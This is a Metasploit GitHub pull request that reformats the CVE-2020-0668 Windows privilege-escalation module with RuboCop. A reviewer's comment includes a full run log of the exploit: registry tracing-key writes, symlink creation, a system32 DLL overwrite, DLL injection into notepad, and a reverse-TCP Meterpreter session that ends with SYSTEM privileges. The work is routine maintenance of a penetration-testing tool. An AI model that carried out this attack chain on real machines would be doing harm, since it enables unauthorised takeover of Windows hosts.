RuboCop autofix exploit/windows/local/cve_2020_0668_service_tracing #13585

wvu · 2020-06-09T23:25:10Z

It looks like RuboCop was run on this file without our .rubocop.yml? The formatting is all messed up from the default RuboCop rules.

#13322

modules/exploits/windows/local/cve_2020_0668_service_tracing.rb

bwatters-r7 · 2020-06-10T12:28:58Z

msf5 exploit(windows/local/cve_2020_0668_service_tracing) > run

[*] Started reverse TCP handler on 192.168.135.168:4444 
[*] Build Number = 17134
[*] Attempting to PrivEsc on DESKTOP-D1E425Q via session ID: 3
[*] Payload DLL is 5120 bytes long
[*] Registry hash = [{:key_name=>"HKLM\\SOFTWARE\\Microsoft\\Tracing\\RASTAPI", :value_name=>"EnableFileTracing", :value_type=>"REG_DWORD", :value_value=>1, :delete_on_cleanup=>false}, {:key_name=>"HKLM\\SOFTWARE\\Microsoft\\Tracing\\RASTAPI", :value_name=>"FileDirectory", :value_type=>"REG_EXPAND_SZ", :value_value=>"C:\\Users\\msfuser\\AppData\\Local\\Temp\\spZODpOx", :delete_on_cleanup=>false}, {:key_name=>"HKLM\\SOFTWARE\\Microsoft\\Tracing\\RASTAPI", :value_name=>"MaxFileSize", :value_type=>"REG_DWORD", :value_value=>5119, :delete_on_cleanup=>false}]
[*] Making C:\Users\msfuser\AppData\Local\Temp\spZODpOx on DESKTOP-D1E425Q
[*] Creating directory C:\Users\msfuser\AppData\Local\Temp\spZODpOx
[*] Meterpreter Session
[*] C:\Users\msfuser\AppData\Local\Temp\spZODpOx created
[*] Made C:\Users\msfuser\AppData\Local\Temp\spZODpOx
[*] Creating mountpoint
[+] Successfuly opened C:\Users\msfuser\AppData\Local\Temp\spZODpOx
[*] Uploading payload to C:\Users\msfuser\AppData\Local\Temp\QRWJnIts.dll
[*] Payload md5 = e21d336dcd00ec3d1e872159e0b65113
[*] Creating Symlinks
[*] Creating symlink C:\Users\msfuser\AppData\Local\Temp\QRWJnIts.dll in \RPC Control\RASTAPI.LOG
[*] Collected Symlink Handle 824
[*] Creating symlink C:\Windows\system32\WindowsCoreDeviceInfo.dll in \RPC Control\RASTAPI.OLD
[*] Collected Symlink Handle 840
[*] Writing EnableFileTracing to HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI
[*] Writing FileDirectory to HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI
[*] Writing MaxFileSize to HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI
[*] Uploading phonebook to DESKTOP-D1E425Q as C:\Users\msfuser\AppData\Local\Temp\pXzmVD.pbk from /home/tmoose/rapid7/metasploit-framework/data/exploits/cve-2020-0668/phonebook.txt
[*] Phonebook uploaded on DESKTOP-D1E425Q to C:\Users\msfuser\AppData\Local\Temp\pXzmVD.pbk
[*] Launching Rasdialer
[*] Running Rasdialer with phonebook C:\Users\msfuser\AppData\Local\Temp\pXzmVD.pbk
[*] Connecting to VPNTEST...

Remote Access error 807 - The network connection between your computer and the VPN server was interrupted.  This can be caused by a problem in the VPN transmission and is commonly the result of internet latency or simply that your VPN server has reached capacity.  Please try to reconnect to the VPN server.  If this problem persists, contact the VPN administrator and analyze quality of network connectivity.

For more help on this error:
	Type 'hh netcfg.chm'
	In help, click Troubleshooting, then Error Messages, then 807
[*] Checking on C:\Windows\system32\WindowsCoreDeviceInfo.dll
[*] Upload payload md5 = e21d336dcd00ec3d1e872159e0b65113
[*] Moved payload md5 = e21d336dcd00ec3d1e872159e0b65113
[*] Cleaning up before triggering dll load...
[*] Removing Registry keys
[*] Deleting EnableFileTracing from HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI key
[*] Deleting FileDirectory from HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI key
[*] Deleting MaxFileSize from HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI key
[*] Removing Symlinks
[*] Closing symlink handle 824: The operation completed successfully.
[*] Closing symlink handle 840: The operation completed successfully.
[*] Removing Mountpoint
[*] Removing directories
[*] Trying to start notepad
[*] Launching notepad to host the exploit...
[+] Process 8812 launched.
[*] Reflectively injecting the trigger DLL into 8812...
[*] Trigger injected.
[*] Trigger injected. Starting thread...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[!] Manual cleanup after reboot required for C:\Windows\system32\WindowsCoreDeviceInfo.dll and C:\Users\msfuser\AppData\Local\Temp\spZODpOx
[*] Exploit complete.  It may take up to 10 minutes to get a session
[*] Sending stage (201283 bytes) to 192.168.132.125
[*] Meterpreter session 4 opened (192.168.135.168:4444 -> 192.168.132.125:49680) at 2020-06-10 07:28:19 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

bwatters-r7 · 2020-06-10T12:39:56Z

Release Notes

Rubocop autofixes to exploit/windows/local/cve_2020_0668_service_tracing

RuboCop autofix cve_2020_0668_service_tracing

9f53884

wvu added module code quality Improving code quality labels Jun 9, 2020

wvu requested a review from bwatters-r7 June 9, 2020 23:25

bwatters-r7 self-assigned this Jun 9, 2020

Unf*ck the RuboCop Description formatting

e669d5d

wvu commented Jun 9, 2020

View reviewed changes

modules/exploits/windows/local/cve_2020_0668_service_tracing.rb Show resolved Hide resolved

bwatters-r7 merged commit 2881a41 into rapid7:master Jun 10, 2020

wvu deleted the bug/rubocop branch June 10, 2020 15:15

tperry-r7 added rn-enhancement release notes enhancement rn-no-release-notes no release notes and removed rn-enhancement release notes enhancement labels Jun 25, 2020

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

RuboCop autofix exploit/windows/local/cve_2020_0668_service_tracing #13585

RuboCop autofix exploit/windows/local/cve_2020_0668_service_tracing #13585

wvu commented Jun 9, 2020

bwatters-r7 commented Jun 10, 2020

bwatters-r7 commented Jun 10, 2020

RuboCop autofix exploit/windows/local/cve_2020_0668_service_tracing #13585

RuboCop autofix exploit/windows/local/cve_2020_0668_service_tracing #13585

Conversation

wvu commented Jun 9, 2020

bwatters-r7 commented Jun 10, 2020

bwatters-r7 commented Jun 10, 2020

Release Notes